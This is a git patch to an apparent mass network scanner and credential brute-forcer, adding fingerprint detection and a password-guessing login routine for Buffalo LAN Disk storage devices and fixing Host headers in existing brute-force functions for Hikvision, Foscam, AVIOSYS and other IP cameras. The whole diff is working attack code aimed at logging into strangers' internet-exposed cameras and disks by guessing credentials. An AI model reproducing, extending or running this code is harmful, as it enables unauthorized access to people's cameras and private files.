From 6ad93f6ca26f11509a7b4ce9a90d6f8be9267efb Mon Sep 17 00:00:00 2001 From: cora32 Date: Sun, 2 Nov 2014 12:53:50 +0300 Subject: [PATCH] Added Buffalo Lan Disk detection --- connector.cpp | 83 +++++++++++++++++++++++++++++++++++++++++++++++---- finder.cpp | 36 ++++++++++++++++++---- nesca_3.cpp | 2 +- 3 files changed, 108 insertions(+), 13 deletions(-) diff --git a/connector.cpp b/connector.cpp index 77fd149..05f4b60 100644 --- a/connector.cpp +++ b/connector.cpp @@ -381,6 +381,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) strcat(hRqst, path); strcat(hRqst, " HTTP/1.1\r\nHost: "); strcat(hRqst, ip); + if(port != 80){ + strcat(hRqst, ":"); + char tbuff[16] = {0}; + strcat(hRqst, itoa(port, tbuff, 10)); + }; if(cookieLen != 0) { strcat(hRqst, "\r\nCookie: "); @@ -577,6 +582,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) strcat(request, path); strcat(request, " HTTP/1.1\r\nHost: "); strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; if(cookieLen != 0) { strcat(request, "\r\nCookie: "); @@ -614,6 +624,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) strcat(request, path); strcat(request, " HTTP/1.1\r\nHost: "); strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; if(cookieLen != 0) { strcat(request, "\r\nCookie: "); @@ -1934,8 +1949,7 @@ lopaStr _WFBrut(char *cookie, char *ip, int port, char *methodVal, char *actionV strcat(request, "\r\nCookie: "); strcat(request, cookie); }; - strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n"); - strcat(request, "Content-length: "); + strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\nContent-Length: "); strcat(request, itoa(strlen(argData), b, 10)); strcat(request, "\r\n\r\n"); @@ -2324,6 +2338,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) { negVector.push_back("Password Error"); } + else if(strcmp(SPEC, "BUFFALO") == 0) + { + negVector.push_back("403 Forbidden"); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); @@ -2358,7 +2376,12 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) strcat(request, "&pwd="); strcat(request, pass); strcat(request, " HTTP/1.1\r\nHost: "); - strcat(request, ip); + strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n"); } else if(strcmp(SPEC, "GEO") == 0) @@ -2369,6 +2392,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) strcat(request, pass); strcat(request, " HTTP/1.1\r\nHost: "); strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n"); } else if(strcmp(SPEC, "EasyCam") == 0) @@ -2383,6 +2411,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) strcat(request, pass); strcat(request, " HTTP/1.1\r\nHost: "); strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n"); } else if(strcmp(SPEC, "Foscam") == 0) @@ -2397,6 +2430,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) strcat(request, pass); strcat(request, " HTTP/1.1\r\nHost: "); strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n"); } else if(strcmp(SPEC, "AVIOSYS") == 0) @@ -2407,7 +2445,38 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) strcat(request, pass); strcat(request, " HTTP/1.1\r\nHost: "); strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n"); + } + else if(strcmp(SPEC, "BUFFALO") == 0) + { + strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: "); + strcat(request, ip); + if(port != 80){ + strcat(request, ":"); + char tbuff[16] = {0}; + strcat(request, itoa(port, tbuff, 10)); + }; + strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive"); + int loginLength = strlen(login); + int passLength = strlen(pass); + int sz = loginLength + passLength + strlen("user=&password="); + char *passString = new char[sz + 1]; + ZeroMemory(passString, sizeof(passString)); + strcpy(passString, "user="); + strcat(passString, login); + strcat(passString, "&password="); + strcat(passString, pass); + strcat(request, "\r\nContent-Length: "); + char tempBuff[16] = {0}; + strcat(request, itoa(sz, tempBuff, 10)); + strcat(request, "\r\n\r\n"); + strcat(request, passString); + delete []passString; }; int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector); @@ -2534,10 +2603,12 @@ int Connector::_ConnectToPort(char *ip, const char *portC, char *hl) int strFlag = 0; strcpy(mes, buff1); strcat(mes, ip); - strcat(mes, ":"); - strcat(mes, portC); - strcat(mes, buff2); int port = atoi(portC); + if(port != 80){ + strcat(mes, ":"); + strcat(mes, portC); + }; + strcat(mes, buff2); int cRes; if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR); diff --git a/finder.cpp b/finder.cpp index 1e722af..a2b358d 100644 --- a/finder.cpp +++ b/finder.cpp @@ -181,7 +181,7 @@ int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port) { if(gNegDebugMode) { - stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\""); + stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\""); if(strlen(negWord) < 2) { stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord))); @@ -290,6 +290,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip) && strstr(buffcpy, "g_ologin.dologin()") != NULL ) return 44; //hikvision cam 2 if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG??? + if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL || strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL @@ -358,6 +359,8 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip) && strstr(buffcpy, "g_ologin.dologin()") != NULL ) return 44; //hikvision cam 2 if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG??? + if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk + if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL) || (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam @@ -1708,7 +1711,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char * } else if(flag == 38) //Foscam { - _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Basic Authorization", cp, recd, "Foscam"); + _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Web Authorization", cp, recd, "Foscam"); } else if(flag == 39) //EagleEye { @@ -1720,7 +1723,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char * } else if(flag == 41) //AVIOSYS-camera { - _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Basic Authorization", cp, recd, "AVIOSYS"); + _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Web Authorization", cp, recd, "AVIOSYS"); } else if(flag == 42) //NW_camera { @@ -1738,6 +1741,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char * { _specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, ""); } + else if(flag == 46) //Buffalo disk + { + _specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO"); + } else if(flag == 20) //AXIS Camera { _specBrute(ps.cookie, ip, p, hl, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "AXIS Camera", "Basic Authorization", cp, recd, ""); @@ -1901,6 +1908,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P strcat(mes, tempPath); strcat(mes, rbuff2); strcat(mes, tempIP); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } if(strlen(cookie) != 0) { strcat(mes, rbuff3); @@ -2028,9 +2040,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P strcat(mes, tempPath); strcat(mes, rbuff2); strcat(mes, tempIP); - strcat(mes, ":"); - char tbuff[16] = {0}; - strcat(mes, itoa(tempPort, tbuff, 10)); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } if(strlen(cookie) != 0) { strcat(mes, rbuff3); @@ -2129,6 +2143,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P strcat(mes, tempPath); strcat(mes, rbuff2); strcat(mes, ip); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } if(strlen(cookie) != 0) { strcat(mes, rbuff3); @@ -2217,6 +2236,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P strcat(mes, tempPath); strcat(mes, rbuff2); strcat(mes, ip); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } if(strlen(cookie) != 0) { strcat(mes, rbuff3); diff --git a/nesca_3.cpp b/nesca_3.cpp index 22628bb..c531d61 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -2194,7 +2194,7 @@ void nesca_3::slotOutData(QString ip, QString str) str.replace("Accept-Encoding:", "Accept-Encoding:"); str.replace("User-Agent:", "User-Agent:"); str.replace("Connection:", "Connection:"); - str.replace("Content-length:", "Content-length:"); + str.replace("Content-Length:", "Content-Length:"); str.replace("Authorization:", "Authorization:"); _rOutProt.indexIn(str); prot = _rOutProt.cap(0);